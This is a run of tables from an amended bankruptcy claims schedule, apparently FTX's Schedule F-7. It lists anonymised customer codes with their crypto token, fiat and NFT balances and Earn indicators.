| 07393404 | | NFT (446947487659676862/Australia Ticket Stub #2405)[1], NFT (472060186031880209/FTX - Off The Grid Miami #929)[1], NFT (542441694042978852/Barcelona Ticket Stub #2349)[1], USD[0.06] | Yes | |
| 07393406 | | TRX[2], USD[0.01] | Yes | |
| 07393410 | | DOGE[1], ETH[.01378607], ETHW[.01378607], USD[0.00] | | |
| 07393413 | | BRZ[1], CUSDT[2], GRT[175.28614329], USD[0.00] | | |
| 07393414 | | SHIB[3822713.61007349], SOL[0.14134692], USD[0.00] | | |
| 07393415 | | BAT[.607], BTC[0], DOGE[.54], ETH[.000773], ETHW[.000773], SOL[0.00155000], USD[0.01], USDT[0] | | |
| 07393416 | | USD[0.01] | | |
| 07393417 | | BRZ[1], BTC[.02068691], CUSDT[1], DOGE[1], SOL[5.38686924], TRX[3], USD[0.27] | | |
| 07393418 | | CUSDT[1], USD[0.53] | Yes | |
| 07393422 | | USD[0.00] | | |
| 07393423 | | BAT[1], BRZ[1], CUSDT[1], DOGE[0], TRX[3], USD[0.00], USDT[1] | | |
| 07393425 | | USD[0.00] | | |
| 07393428 | | BCH[.03018264], BRZ[2], BTC[.00100451], CUSDT[5], DOGE[1943.81612708], ETH[.01096975], ETHW[.01083295], GRT[9.73711793], LINK[.61868312], LTC[.09151597], SOL[1.89885689], SUSHI[1.47366517], TRX[352.69593877], USD[0.00], USDT[21.68091728] | Yes | |
| 07393432 | | CUSDT[1], DOGE[2], TRX[4], USD[0.00] | Yes | |
| 07393435 | | USD[0.01] | | |
| 07393436 | | BRZ[2], CUSDT[5], DOGE[1260.34452979], TRX[2], USD[4309.80] | | |
| 07393438 | | BAT[5.394999], BRZ[10.95369684], BTC[0.00023996], CUSDT[24], DOGE[19.57878622], ETH[.23049133], ETHW[.00000326], GRT[3.14431756], SHIB[5], SOL[0], TRX[26.01279357], USD[0.00], USDT[0] | Yes | |
| 07393440 | | USDT[0.00001289] | | |
| 07393441 | | BRZ[1], DOGE[455.00678455], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07393442 | | CUSDT[3], DOGE[3], USD[0.52] | | |
| 07393443 | | BTC[0.00001360], DOGE[.1727], ETH[.00070919], ETHW[.00070919], SOL[.008935], USD[31687.08] | | |
| 07393445 | | BAT[0], DOGE[1] | | |
| 07393449 | | ETHW[.125], USD[1.00] | | |
| 07393450 | | BTC[0], CUSDT[2], DOGE[1], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07393452 | | BRZ[1], CUSDT[4], TRX[1], USD[0.00] | | |
| 07393454 | | BAT[3.0898673], BRZ[10.43704144], CUSDT[35], DOGE[5219.56442052], ETH[.04802037], ETHW[.04742289], GRT[3.0007946], LINK[2.08740833], SHIB[1], TRX[20.8738923], USD[12.12], USDT[10.5208269] | Yes | |
| 07393456 | | DOGE[2], TRX[8961.59708746], USD[0.00] | | |
| 07393464 | | BRZ[1], CUSDT[2], DOGE[1], USD[1.00], USDT[0] | | |
| 07393465 | | USD[0.01], USDT[1.98] | | |
| 07393470 | | CUSDT[2], MATIC[32.58730572], TRX[2], USD[0.00] | | |
| 07393474 | | CUSDT[2], DOGE[101.11799978], TRX[2], USD[0.04] | | |
| 07393475 | | BRZ[1], BTC[.00521241], CUSDT[9], DOGE[219.683806], ETH[.00625341], ETHW[.00625341], SHIB[8064715.87358062], TRX[14948.69339087], USD[0.00], USDT[0] | | |
| 07393477 | | DOGE[0], TRX[27933.37491585], USD[490.05] | Yes | |
| 07393480 | | BRZ[1], BTC[.08848865], DOGE[3], ETH[2.19447972], ETHW[2.19355802], TRX[6.33223745], USD[0.01] | Yes | |
| 07393482 | | USD[10.00] | | |
| 07393487 | | SHIB[1646811.92227841], USD[0.00] | | |
| 07393489 | | BTC[0.00000760], LTC[.00062], SOL[.0576], SUSHI[.339], USD[1.23] | | |
| 07393493 | | BTC[.00020298], DOGE[273.63554372], TRX[1], USD[0.00], USDT[4.97153987] | | |
| 07393498 | | BTC[.00020906], USD[0.00] | | |
| 07393500 | | GRT[.69505], USD[0.24], USDT[0.07035957] | | |
| 07393506 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07393508 | | BTC[.0023571], CUSDT[5], DOGE[4336.3160655], ETH[.08586662], ETHW[.08484043], SHIB[726379.26108922], TRX[1060.43391679], USD[222.43] | Yes | |
| 07393510 | | BRZ[2], CUSDT[5.0007062], DOGE[2], MATIC[83.38546297], TRX[2], UNI[.00039479], USD[0.00] | Yes | |
| 07393512 | | TRX[.000015], USD[0.19], USDT[.01] | | |
| 07393521 | | CUSDT[1], ETH[.12870703], ETHW[.12870703], USD[0.00] | | |
| 07393529 | | ETH[0], MATIC[0.00000001], SOL[0], TRX[.000034], USD[0.00], USDT[0.00002098], WBTC[0] | Yes | |
| 07393530 | | USD[10.00] | | |
| 07393531 | | BTC[0.00001851], ETH[0], ETHW[0], SUSHI[.264] | | |
| 07393540 | | BAT[0], CUSDT[5.04192066], DOGE[0], SOL[0.00229539], TRX[0.00917992], USD[1.04] | | |
| 07393541 | | DOGE[1], USD[0.00] | | |
| 07393549 | | DOGE[3633.35916568] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07393550 | | USD[0.00] | | |
| 07393553 | | DOGE[1], USD[0.00] | | |
| 07393556 | | BRZ[63.22169045], SHIB[33], USD[2190.18], USDT[0.00000001] | Yes | |
| 07393559 | | USD[100.00] | | |
| 07393567 | | ETH[0.00000003], ETHW[0], SUSHI[.00000001], USD[0.00], USDT[0.00002985] | | |
| 07393570 | | DOGE[145.69333418], GRT[4.32741908], TRX[90.05737735], USD[0.00] | | |
| 07393571 | | BTC[.0004205], DOGE[1.0010762], ETH[.00269719], ETHW[.00269719], USD[0.00] | | |
| 07393572 | | DOGE[1], SGD[2.61], USD[0.00] | | |
| 07393573 | | USD[0.00] | | |
| 07393576 | | BCH[.02423717], BRZ[1], BTC[.00145541], CUSDT[6], DOGE[312.49939824], ETH[.03081548], ETHW[.03043244], GRT[24.13690818], KSHIB[278.73173714], LTC[.05484847], MATIC[18.7592974], SHIB[302524.75651273], SOL[.70035521], TRX[200.53088149], USD[0.00], YFI[.00035698] | Yes | |
| 07393577 | | CUSDT[1], DOGE[2], LINK[39.52530477], SUSHI[41.76864876], TRX[1], USD[0.00] | Yes | |
| 07393586 | | USD[0.00] | | |
| 07393589 | | USD[0.00] | | |
| 07393591 | | CUSDT[6], DOGE[573.92486682], SOL[.78717745], TRX[381.90978373], USD[0.00] | | |
| 07393593 | | BRZ[2], BTC[.00001242], CUSDT[10], DOGE[23.86902536], ETH[0.00001544], ETHW[0.00001544], GRT[1.09473448], SOL[0.00468159], TRX[.70385672], USD[0.46], USDT[1] | | |
| 07393598 | | BTC[0.00418316], DOGE[0], ETH[0], SHIB[5], TRX[0], USD[0.01], USDT[1.02355149] | Yes | |
| 07393600 | | DOGE[3], USD[0.00] | | |
| 07393601 | | DOGE[38157.57446803], GRT[1.00493759], USD[0.00] | Yes | |
| 07393602 | | BRZ[2], DOGE[5], ETH[.00082599], ETHW[.00082599], SUSHI[.00090841], TRX[1.99665202], USD[0.76] | | |
| 07393604 | | NFT (3207759876479420073/Coachella x FTX Weekend 1 #17775)[1] | | |
| 07393605 | | DOGE[33.40530691], GRT[5.08074822], TRX[53.29195982], USD[0.00] | | |
| 07393606 | | USD[0.00] | | |
| 07393608 | | DOGE[1], TRX[441.89715285], USD[0.00] | | |
| 07393609 | | CUSDT[1], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07393610 | | DOGE[2], TRX[0], USD[0.00] | | |
| 07393615 | | AVAX[.72035922], BRZ[6.31597376], BTC[.07740763], CUSDT[895.58882555], DOGE[20491.5498642], ETH[.37283579], ETHW[.37267939], GRT[10.36550511], LINK[1.18227379], LTC[1.68918335], MATIC[11.69977533], SHIB[497129.12611036], SOL[11.29411932], SUSHI[1.30374235], TRX[616.3844601], USD[37.48] | Yes | |
| 07393626 | | USD[0.00], USDT[0] | | |
| 07393628 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07393629 | | BTC[.00300885], DOGE[1997], SOL[3.00499], USD[6.36] | | |
| 07393631 | | DOGE[15.21158196], GRT[0], SHIB[0], SOL[0], USD[0.00] | Yes | |
| 07393633 | | BTC[.00003381], ETH[0], USD[0.00] | Yes | |
| 07393634 | | USD[0.00] | | |
| 07393638 | | BAT[3.00995792], BRZ[0], DOGE[15.29187073], GRT[30.46262595], KSHIB[69.0604417], LINK[0], SHIB[72149.48561521], SOL[0], TRX[2], UNI[0], USD[0.00] | Yes | |
| 07393639 | | BCH[.02145698], CUSDT[4], USD[0.00] | | |
| 07393643 | | ETH[0], SOL[0], USD[0.00], USDT[18.97673865] | | |
| 07393644 | | BAT[2], TRX[3], USD[0.00] | | |
| 07393645 | | BRZ[0.00004713], CUSDT[1], DOGE[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07393646 | | DOGE[3], USD[0.00] | | |
| 07393649 | | DOGE[1], TRX[2217.44977753], USD[0.00] | | |
| 07393650 | | BRZ[1], CUSDT[4430.278932], DOGE[1537.38357341], TRX[705.54619461], USD[1.88] | | |
| 07393660 | | CUSDT[2], DOGE[496.62319784], ETH[.02000556], ETHW[.02000556], TRX[2822.92898448], USD[0.69] | | |
| 07393662 | | BTC[.00025217], CUSDT[1], DOGE[72.51141428], LTC[.04871262], SOL[1.28477614], TRX[433.39347806], USD[0.00] | | |
| 07393663 | | BRZ[.00330956], DOGE[.00255013], ETH[.00000751], ETHW[.00000751], GRT[.00649874], LINK[.00954647], USD[66.69] | Yes | |
| 07393665 | | USD[0.00] | | |
| 07393666 | | USD[0.00] | | |
| 07393667 | | ETH[.00007544], ETHW[.00007544] | | |
| 07393669 | | BTC[.00000036], DOGE[.002], USD[272.68] | | |
| 07393676 | | USD[10.00] | | |
| 07393678 | | BTC[0], ETH[0], SOL[0], UNI[.00004198], USD[0.00] | | |
| 07393680 | | CUSDT[4], DOGE[1145.77846912], TRX[1268.99538034], USD[0.00] | | |
| 07393683 | | CUSDT[2], DOGE[37834.36199085], GRT[1], LINK[1], TRX[1], USD[500.65] | | |
| 07393684 | | BRZ[4], DOGE[1], ETH[.01254309], ETHW[.01254309], TRX[5], USD[0.00] | | |
| 07393690 | | DOGE[.703], ETH[.000712], ETHW[.000712], GRT[.876], SUSHI[.246], USD[0.77] | | |
| 07393691 | | BRZ[1], CUSDT[3], DOGE[2], TRX[1], USD[0.00] | | |
| 07393694 | | AAVE[0], BAT[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07393695 | | DOGE[1], TRX[.61429714], USD[0.73] | | |
| 07393696 | | CUSDT[4], DOGE[50.63174389], TRX[24.54260453], USD[0.18] | | |
| 07393699 | Contingent, Disputed | DOGE[0], ETH[0], USD[0.00] | | |

Amended Schedule F-7: Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07393700 | | DOGE[1], SOL[2.07557182], USD[0.00] | | |
| 07393705 | | DOGE[1.26116019], USD[0.00] | | |
| 07393710 | | DOGE[.07155093], TRX[1], USD[0.01], USDT[0] | | |
| 07393714 | | CUSDT[14], DOGE[135.33647005], TRX[1], USD[0.00] | | |
| 07393715 | Contingent, Disputed | BCH[0], BTC[0.01275799], DOGE[ 36302892], LINK[0], USD[0.00] | | |
| 07393716 | | USD[0.01] | | |
| 07393718 | | BTC[0.00004596], ETH[0], ETHW[0], UNI[0] | | |
| 07393729 | | ETH[0], ETHW[-0.00008392], USD[0.01], USDT[0.00179838] | | |
| 07393735 | | ETH[.00000018], ETHW[.00000018], SHIB[4], SOL[.00001115], USD[0.62], USDT[0.00000936] | Yes | |
| 07393736 | | TRX[.912], USD[0.24] | | |
| 07393738 | | BTC[.00000003], NFT (541484845762050540/Entrance Voucher #3531)[1], USD[0.00] | | |
| 07393741 | | BTC[.00002754], LINK[1], USD[0.00] | | |
| 07393744 | | DAI[98.8676461], DOGE[2325.54660112], TRX[2677.94593691], USD[0.00] | | |
| 07393748 | | BTC[0], SHIB[1], USD[0.01] | | |
| 07393750 | | CUSDT[3], DOGE[47.16710663], ETH[.00402488], ETHW[0.00397016], USD[1658.82], USDT[0.00454294] | Yes | |
| 07393754 | | ETH[.00075819], ETHW[.00075819], SUSHI[0.44650000], UNI[.04704732], USD[0.00], USDT[0.00000015] | | |
| 07393755 | | USD[10.00] | | |
| 07393758 | | BAT[527.12877302], BCH[1.20967542], BRZ[597.01164093], CUSDT[15272.12855126], DAI[53.50936019], DOGE[9878.13157348], ETH[1.05847015], ETHW[1.05802564], GRT[2], KSHIB[6405.90899764], LTC[2.16511491], SHIB[17292487.4980827], SOL[15.40411909], TRX[11778.58742513], UNI[.46235991], USD[237.28], USDT[3.214025], YFI[.00303439] | Yes | |
| 07393765 | | BAT[2.00642587], BRZ[3], CUSDT[4], DOGE[0.01222056], MATIC[1.01406139], SHIB[3], TRX[8], USD[120.92], USDT[2.08040494] | Yes | |
| 07393768 | | DOGE[2], GRT[39.34104374], USD[0.00] | | |
| 07393773 | | DOGE[.39546772], USD[0.00] | | |
| 07393780 | | DOGE[.00004693], TRX[.00005524], USD[0.00] | | |
| 07393782 | | DOGE[1188.34136876], TRX[1], USD[0.00] | | |
| 07393786 | | CUSDT[2], GRT[9.81185767], LINK[.71236277], NFT (320704530426676926/ApexDucks #318)[1], NFT (436606140920921831/ApexDucks #3457)[1], NFT (560549950867554569/ApexDucks #4488)[1], SHIB[24850.7791873], SOL[.02201233], SUSHI[3.52935382], USD[30.93], USDT[0] | Yes | |
| 07393791 | | AAVE[1.23664399], AVAX[2.42319129], BF_POINT[100], BTC[.00000009], DOGE[3], SHIB[1077.22861481], SOL[2.10925742], SUSHI[0.00046624], UNI[0.00001708], USD[0.01], YFI[0] | Yes | |
| 07393792 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07393796 | | BAT[1], BRZ[0], DOGE[1], LTC[16.20065346], SOL[20.32397141], USD[5999.89], USDT[0] | Yes | |
| 07393797 | | DOGE[3276.82151061], SHIB[6806725.78601541], USD[0.00], USDT[1.08662569] | Yes | |
| 07393799 | | USD[10.00] | | |
| 07393801 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07393802 | | USD[4.70] | | |
| 07393805 | | NFT (551162761555437399/Coachella x FTX Weekend 1 #19697)[1] | | |
| 07393806 | | DOGE[466.69011266], SHIB[4035485.99337016], USD[0.00], USDT[0] | | |
| 07393808 | | USD[0.00], USDT[1] | | |
| 07393811 | | TRX[68.77198812], USD[0.00] | | |
| 07393813 | | ETH[.00000141], ETHW[.00000141], USD[0.00] | | |
| 07393815 | | USD[281.05] | | |
| 07393816 | | CUSDT[1], GRT[1], USD[0.00], USDT[1.06308795] | Yes | |
| 07393818 | | BTC[0], USD[0.00] | | |
| 07393822 | | CUSDT[4], USD[0.00] | | |
| 07393830 | | CUSDT[3], DOGE[1], TRX[.00003468], USD[0.01], USDT[2] | | |
| 07393833 | | USD[5.90] | | |
| 07393836 | | ETH[0], USD[0.01], USDT[0.00542098] | | |
| 07393839 | | BCH[7.55756943], BTC[.00001603], DOGE[3852.67409767], USD[0.02], USDT[0.00000001] | Yes | |
| 07393844 | | BRZ[2], DOGE[4], USD[0.03] | | |
| 07393851 | | BRZ[3], BTC[0], CUSDT[32], DOGE[1.00189073], LINK[0], MATIC[0], NFT (294982290917666771/CryptoAvatar #87)[1], NFT (314274203926399266/Anime #24)[1], NFT (336050149480228411/CryptoAvatar #102)[1], NFT (347330692123950351/Light House #0451)[1], NFT (374122142724948593/Anime #35)[1], NFT (382599819455436409/CryptoAvatar #117)[1], NFT (383299408425441096/Surfs up)[1], NFT (383466356867302955/Anime #14)[1], NFT (405020902023417065/Anime #2)[1], NFT (408176210803441781/Anime #32)[1], NFT (417219212787618544/Anime #27)[1], NFT (427110058968222255/CryptoAvatar #120)[1], NFT (478591073746620822/Anime #8)[1], NFT (496055022284710170/Boats Under The Bridge )[1], NFT (497304522833996996/Country)[1], NFT (504374984874568847/Anime #11)[1], NFT (505078841847504975/CryptoAvatar #121)[1], NFT (505938425258880302/Sand Bar )[1], NFT (513400577824258017/CryptoAvatar #108)[1], NFT (522733399190094890/CryptoAvatar #123)[1], NFT (552835445492844673/Stretch )[1], NFT (553982617648128329/Razorback Stadium)[1], NFT (573994014948172317/CryptoAvatar #106)[1], SHIB[142.44431546], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07393852 | | BRZ[1], BTC[.03124831], CUSDT[4], DOGE[526.87529702], ETH[.11867934], ETHW[.11867934], LINK[25.48466335], LTC[2.4689412], TRX[4], USD[0.00] | | |
| 07393854 | | CUSDT[12], DOGE[4439.57625655], ETH[.02694072], ETHW[.02694072], SHIB[7394817.91573499], USD[0.00] | | |
| 07393856 | | BAT[1], BRZ[4], CUSDT[64], DOGE[3], ETH[.04153442], ETHW[.04153442], GRT[2], KSHIB[1431.16204259], SHIB[889047.94167852], SOL[.41203187], USD[129.76], USDT[1] | | |
| 07393863 | | BTC[0], ETH[0], USD[0.00] | | |
| 07393866 | | DOGE[.05637247], TRX[.02220956], USD[0.00], USDT[0.00000001] | Yes | |
| 07393869 | | CUSDT[1], USD[0.00] | Yes | |
| 07393870 | | BRZ[1], GRT[.00000002], USD[0.00], USDT[0] | Yes | |
| 07393874 | | BCH[0], DOGE[1], ETHW[.06078538], SHIB[4], TRX[3], USD[1174.84] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07393881 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07393882 | | DOGE[0], USD[0.00] | Yes | |
| 07393888 | | BAT[0], CUSDT[1], DOGE[1], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07393889 | | LINK[1.10758482], TRX[1], USD[0.00] | | |
| 07393893 | | USD[5.23] | | |
| 07393895 | | DOGE[9227.72670052], TRX[1], USD[0.00] | Yes | |
| 07393897 | | USD[0.01] | | |
| 07393899 | | USD[0.01], USDT[0] | | |
| 07393900 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07393907 | | CUSDT[1333.1312193], DOGE[1127.52879886], SHIB[2503133.4534667], TRX[732.66354984], USD[15.21] | Yes | |
| 07393911 | | BRZ[1], USD[0.00] | | |
| 07393912 | | TRX[374.31372617], USD[0.18] | Yes | |
| 07393916 | | TRX[60.79948033], USD[0.00] | | |
| 07393917 | | CUSDT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07393920 | | BTC[0.00477311], SOL[55.78], USD[22.57], YFI[.00095] | | |
| 07393924 | | BRZ[5.07952967], BTC[0], CUSDT[16], DOGE[7.00057537], ETH[0], SHIB[1], SUSHI[0], TRX[6], USD[0.01], USDT[1.06425362] | Yes | |
| 07393929 | | BRZ[2], CUSDT[2], LINK[.0063285], TRX[2], USD[0.26] | | |
| 07393932 | | DAI[0], USD[0.00], USDT[0] | | |
| 07393935 | | BAT[1.0165555], BRZ[1], BTC[0], DOGE[9722.16888818], TRX[2], USD[0.00], USDT[2.19623583] | Yes | |
| 07393937 | | DOGE[141.75594219], USD[0.00] | | |
| 07393946 | | USD[96.90] | | |
| 07393952 | | NFT [289744448472843864/Imola Ticket Stub #1727][1], NFT [415767320228400943/Barcelona Ticket Stub #493][1] | | |
| 07393956 | | AAVE[0], BAT[3.23014133], BCH[0], BRZ[2], BTC[0], CUSDT[6], DOGE[2], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[1.27356776], SOL[0], TRX[2], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07393959 | | USD[10.00] | | |
| 07393960 | | ETHW[5.2180956], USD[2.71] | | |
| 07393965 | | CUSDT[1], DOGE[0], ETH[0], LINK[0], SOL[.00004674], USD[0.38] | Yes | |
| 07393968 | | BTC[.00000371], CUSDT[1], DOGE[1], TRX[1], USD[0.46] | | |
| 07393972 | | BRZ[2], CUSDT[8], DOGE[1], ETH[.03241433], ETHW[.0320136], NFT [441319457988945512/#19 Social Donald][1], NFT [509580346771677485/Dream Land #10][1], SOL[35.19318195], SUSHI[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07393974 | | CUSDT[3], DOGE[1], LINK[.00000974], SOL[0], TRX[4], USD[0.00] | Yes | |
| 07393976 | | CUSDT[4], DOGE[7], ETHW[.03900344], TRX[1], USD[679.40] | | |
| 07393977 | | USD[0.00] | | |
| 07393978 | | AVAX[.0968], BTC[.01319929], DOGE[.002], ETH[.190321], ETHW[.190321], GRT[.431], KSHIB[3.25], LINK[.0791], LTC[.00956], MATIC[9.63], SHIB[93300], SOL[3.34176], SUSHI[.469], UNI[.0922], USD[159.39] | | |
| 07393984 | | DOGE[0], SHIB[0], USD[0.01] | | |
| 07393986 | | TRX[8927.48645637], USD[0.00] | | |
| 07393987 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07393988 | | BTC[.5117], NFT [425667173959785096/Weird Friends PROMO][1], USD[7586.66] | | |
| 07393990 | | BTC[0], CUSDT[9], DOGE[1], ETH[0], LTC[0], TRX[3], USD[0.00], USDT[1.00009580] | | |
| 07393992 | | BAT[.00003873], TRX[.00003219], USD[0.01] | | |
| 07393997 | | DOGE[698.30818967], LINK[0], TRX[3], USD[1.10622088] | Yes | |
| 07394000 | | CUSDT[3], DOGE[2], SHIB[934525.60740723], USD[0.00], USDT[0] | Yes | |
| 07394001 | | CUSDT[1], DOGE[925.05052574], TRX[1], USD[0.00] | | |
| 07394004 | | ETH[.00000001] | | |
| 07394006 | | BAT[0], BCH[0], BRZ[1], CUSDT[0], DOGE[5], GRT[1], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0], YFI[0] | | |
| 07394009 | | BRZ[11.09349756], CUSDT[86.44132468], SOL[.0000326], TRX[34.39814987], USD[0.27], USDT[1.10527128] | Yes | |
| 07394011 | | USD[0.00] | | |
| 07394016 | | BTC[0], DOGE[0], USD[0.05] | | |
| 07394019 | | AAVE[.40606], BCH[.000834], BTC[.00001228], CAD[0.95], ETH[.000543], ETHW[.000543], MATIC[9.91], MKR[.00025522], TRX[.258], UNI[.0827], USD[2482.61] | | |
| 07394021 | | BTC[.00210155], CUSDT[1], DOGE[56.4845129], ETH[.08210486], ETHW[.08210486], GRT[82.34295388], LINK[2.79077831], USD[116.43] | | |
| 07394024 | | BCH[.05842298], BTC[0.00184326], CUSDT[2], DOGE[17.91898496], ETH[.01100306], ETHW[.01086626], LINK[.36723629], SHIB[1], SOL[1.9820112], TRX[157.89351479], USD[0.00] | Yes | |
| 07394028 | | BTC[.00000001], ETH[.00000076], ETHW[.08219143], EUR[13.68], SHIB[1], USD[0.17] | Yes | |
| 07394030 | | USD[0.00], USDT[0] | | |
| 07394031 | | CUSDT[1], DOGE[2], SOL[.35458779], UNI[1.85546985], USD[0.00] | | |
| 07394032 | | CUSDT[2], DOGE[684.29350237], SHIB[484927.25054187], USD[0.00] | Yes | |
| 07394036 | | BRZ[4], CUSDT[3], DOGE[0], TRX[1], USD[0.85] | | |
| 07394046 | | SOL[.98419069], TRX[10.36494342], USD[0.00] | | |
| 07394048 | | DOGE[25.6403021], SUSHI[11.64116249], USD[0.00] | | |
| 07394049 | | BRZ[1], CUSDT[1], DOGE[6], USD[0.00] | | |
| 07394050 | | BRZ[1], BTC[.00145464], CUSDT[10], DOGE[4], LTC[.2414397], SHIB[4], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07394054 | | AUD[0.00], CUSDT[1], USD[0.01], USDT[1] | | |
| 07394055 | | BAT[0], CUSDT[11], DOGE[0], SOL[0], SHIB[0.00] | | |
| 07394057 | | USD[10.00] | | |
| 07394058 | | AVAX[8.61866238], BRZ[1], DOGE[2], SHIB[3], TRX[3], USD[0.00] | | |
| 07394059 | | CUSDT[1], DOGE[.00000929], USD[0.00] | | |
| 07394069 | | DOGE[2], LTC[.28751776], USD[0.00] | | |
| 07394072 | | DOGE[1], USD[0.00] | | |
| 07394075 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07394077 | | USD[0.05] | | |
| 07394078 | | BTC[0.03045312], DOGE[0], ETH[0.01099922], ETHW[0.01099921], LINK[0], MATIC[9.99983922], NFT [295623197764684271/Ethereals 358][1], NFT [314004824764665634/Ethereals 984][1], NFT [333129273936697223/Ethereals 1018][1], NFT [350757780479481484/Ethereals 595][1], NFT [352716606364565682/Ethereals 707][1], NFT [373433635534427704/Ethereals 1012][1], NFT [395129564820353036/Ethereals 607][1], NFT [444449117211977493/Ethereals 594][1], NFT [455460327722804864/Ethereals 374][1], NFT [478906039505851350/Ethereals 174][1], NFT [492975995222971454/Ethereals 940][1], NFT [531222279330828662/Ethereals 1017][1], NFT [571182399638094801/Ethereals 379][1], SOL[1.82108817], SUSHI[.00000001], USD[2.92], USDT[0.00035848] | | |
| 07394080 | | USD[0.01], USDT[0] | | |
| 07394081 | | DOGE[.00497211], ETH[0], ETHW[0], GRT[1], USD[0.00], USDT[1] | | |
| 07394083 | | CUSDT[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07394084 | | CUSDT[2582.01512672], DOGE[3090.15358462], TRX[797.37683628], USD[0.00] | Yes | |
| 07394087 | | USD[114.60] | | |
| 07394090 | | BRZ[1], USD[0.02] | | |
| 07394096 | | SHIB[1], TRX[4], USD[0.01] | Yes | |
| 07394103 | | BRZ[1], BTC[.00052318], CUSDT[6], ETH[.01119967], ETHW[.01119967], USD[0.00] | | |
| 07394107 | | BRZ[1], NFT [291656936276069322/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #39][1], NFT [423362695343849209/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #48][1], NFT [511755731472326023/Vox Robo #16][1], NFT [519983176643853003/CryptoAvatar #144][1], NFT [536986742461739685/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #53][1], NFT [550852369422510918/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #40][1], SHIB[2], USD[0.00], USDT[.00815274] | Yes | |
| 07394113 | | CUSDT[3], DOGE[2008.52941275], USD[0.00] | | |
| 07394120 | | ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07394123 | | CUSDT[3], DOGE[5], USD[0.01] | | |
| 07394125 | | AUD[1.31], TRX[192.9755377], USD[18.57], USDT[2] | | |
| 07394127 | | BAT[2], BRZ[2], BTC[0], CUSDT[6], DOGE[1], ETH[.29969759], ETHW[.29969759], GRT[1], SOL[11.95926339], TRX[4], USD[0.00] | | |
| 07394128 | | CUSDT[1], DOGE[1], SHIB[2611504.22218924], USD[0.00] | Yes | |
| 07394129 | | DOGE[1], USD[0.00] | | |
| 07394130 | | USD[500.00] | | |
| 07394134 | | USD[0.00] | | |
| 07394135 | | BAT[0], BF_POINT[200], BRZ[0], BTC[0], DOGE[0], ETH[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], SHIB[1.00000004], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07394137 | | USD[12.36] | | |
| 07394138 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07394139 | | USD[0.00], USDT[0] | | |
| 07394140 | | USD[0.00] | | |
| 07394143 | | TRX[1], USD[0.00] | | |
| 07394145 | | CUSDT[1], DOGE[1], USD[3.43] | | |
| 07394146 | | USD[0.47], USDT[0] | | |
| 07394152 | | BF_POINT[200], DOGE[119085.49988412], ETH[0.03301496], ETHW[0.03261404], NFT [541718438918203055/Australia Ticket Stub #13][1], SHIB[33214532.12887916], TRX[30.78782012], USD[0.00], USDT[0.48756320] | Yes | |
| 07394154 | | USD[100.00] | | |
| 07394156 | | USD[0.00], USDT[1] | | |
| 07394160 | | BTC[0], GRT[0], UNI[0], USD[50.00], YFI[0] | | |
| 07394172 | | CUSDT[1], DAI[49.62613456], USD[0.00] | | |
| 07394174 | | BRZ[2], CUSDT[2], DOGE[1], ETH[.25674866], ETHW[.25674866], TRX[2], USD[0.00] | | |
| 07394176 | Contingent, Disputed | USD[0.00] | | |
| 07394180 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07394181 | Contingent, Disputed | BRZ[0], BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07394184 | | BRZ[1], CUSDT[1], ETH[0], ETHW[0], GRT[4.92606408], USD[42.76] | | |
| 07394185 | | LINK[.30955408], USD[0.00] | | |
| 07394187 | | BRZ[1], CUSDT[36.07491337], TRX[2], USD[0.00] | | |
| 07394189 | | DOGE[41.11161791], ETH[.01510054], ETHW[.01510054], USD[0.00] | | |
| 07394195 | | BAT[2], BCH[1.10730672], BRZ[2], CUSDT[1217.28059926], DOGE[2], ETH[.48267989], ETHW[.48267989], GRT[2], LTC[2.30565104], TRX[2], USD[0.00], USDT[1] | | |
| 07394198 | | USD[3.39] | | |
| 07394201 | | CUSDT[1], DOGE[9366.63075013], USD[0.00] | Yes | |
